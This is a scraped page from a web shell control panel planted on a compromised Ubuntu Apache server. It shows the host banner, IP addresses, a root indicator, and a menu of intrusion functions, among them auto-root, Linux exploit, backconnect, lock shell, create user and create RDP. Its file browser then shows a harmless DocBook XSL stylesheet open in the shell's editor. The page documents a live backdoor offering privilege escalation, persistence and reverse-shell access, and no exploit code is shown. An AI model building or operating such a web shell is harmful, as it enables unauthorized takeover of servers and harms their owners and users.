Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
yelp-xsl /
xslt /
docbook /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
db2html-bibliography.xsl
14.66
KB
-rw-r--r--
db2html-block.xsl
23.32
KB
-rw-r--r--
db2html-callout.xsl
3.65
KB
-rw-r--r--
db2html-classsynopsis.xsl
24.32
KB
-rw-r--r--
db2html-cmdsynopsis.xsl
22.26
KB
-rw-r--r--
db2html-css.xsl
6.51
KB
-rw-r--r--
db2html-division.xsl
37.22
KB
-rw-r--r--
db2html-ebnf.xsl
2.08
KB
-rw-r--r--
db2html-footnote.xsl
5.89
KB
-rw-r--r--
db2html-funcsynopsis.xsl
7.12
KB
-rw-r--r--
db2html-index.xsl
8.4
KB
-rw-r--r--
db2html-inline.xsl
39.16
KB
-rw-r--r--
db2html-links.xsl
8.26
KB
-rw-r--r--
db2html-list.xsl
23.1
KB
-rw-r--r--
db2html-math.xsl
6.02
KB
-rw-r--r--
db2html-media.xsl
18.08
KB
-rw-r--r--
db2html-refentry.xsl
8.34
KB
-rw-r--r--
db2html-suppressed.xsl
3.62
KB
-rw-r--r--
db2html-table.xsl
50.97
KB
-rw-r--r--
db2html-xref.xsl
7.23
KB
-rw-r--r--
db2html.xsl
1.74
KB
-rw-r--r--
db2xhtml.xsl
2.65
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : db2html-suppressed.xsl
<?xml version='1.0' encoding='UTF-8'?><!-- -*- indent-tabs-mode: nil -*- --> <!-- This program is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with this program; see the file COPYING.LGPL. If not, see <http://www.gnu.org/licenses/>. --> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:db="http://docbook.org/ns/docbook" exclude-result-prefixes="db" version="1.0"> <!-- If you add a template to this stylesheet, put it under an appropriate header that states why this element is suppressed. Some elements are simply not supported, while other elements are expected only to be processed in certain modes because of the DocBook content model. --> <!-- Not rendered directly --> <xsl:template match="subtitle | db:subtitle"/> <xsl:template match="titleabbrev | db:titleabbrev"/> <!-- Not yet supported --> <xsl:template match="remark | db:remark"/> <!-- Suppressed by processing expectations --> <xsl:template match="screeninfo | db:screeninfo"/> <!-- Not supported --> <xsl:template match="alt | db:alt"/> <xsl:template match="beginpage"/> <xsl:template match="bibliocoverage | db:bibliocoverage"/> <!-- Explicitly matched by parent --> <xsl:template match="listitem | db:listitem"/> <xsl:template match="sbr | db:sbr"/> <!-- Index elements, not yet supported --> <xsl:template match="indexterm | db:indexterm"/> <xsl:template match="primary | db:primary"/> <xsl:template match="primaryie | db:primaryie"/> <xsl:template match="secondary | db:secondary"/> <xsl:template match="secondaryie | db:secondaryie"/> <xsl:template match="see | db:see"/> <xsl:template match="seeie | db:seeie"/> <xsl:template match="seealso | db:seealso"/> <xsl:template match="seealsoie | db:seealsoie"/> <xsl:template match="tertiary | db:tertiary"/> <xsl:template match="tertiaryie | db:tertiaryie"/> <!-- Unmatched info elements, supported indirectly --> <xsl:template match="appendixinfo | db:appendix/db:info"/> <xsl:template match="blockinfo | db:info[not(contains(local-name(..), 'object'))]"/> <xsl:template match="articleinfo | db:article/db:info"/> <xsl:template match="bibliographyinfo | db:bibliography/db:info"/> <xsl:template match="bookinfo | db:book/db:info"/> <xsl:template match="chapterinfo | db:chapter/db:info"/> <xsl:template match="glossaryinfo | db:glossary/db:info"/> <xsl:template match="partinfo | db:part/db:info"/> <xsl:template match="prefaceinfo | db:preface/db:info"/> <xsl:template match="refentryinfo | db:refentry/db:info"/> <xsl:template match="referenceinfo | db:reference/db:info"/> <xsl:template match="refmeta | db:refmeta"/> <xsl:template match="refmiscinfo | db:refmiscinfo"/> <xsl:template match="refsynopsisdivinfo | db:refsynopsisdiv/db:info"/> <xsl:template match="sect1info | db:sect1/db:info"/> <xsl:template match="sect2info | db:sect2/db:info"/> <xsl:template match="sect3info | db:sect3/db:info"/> <xsl:template match="sect4info | db:sect4/db:info"/> <xsl:template match="sect5info | db:sect5/db:info"/> <xsl:template match="sectioninfo | db:section/db:info"/> <!-- Handled specially, so we can apply-templates --> <xsl:template match="label | db:label"/> </xsl:stylesheet>
Close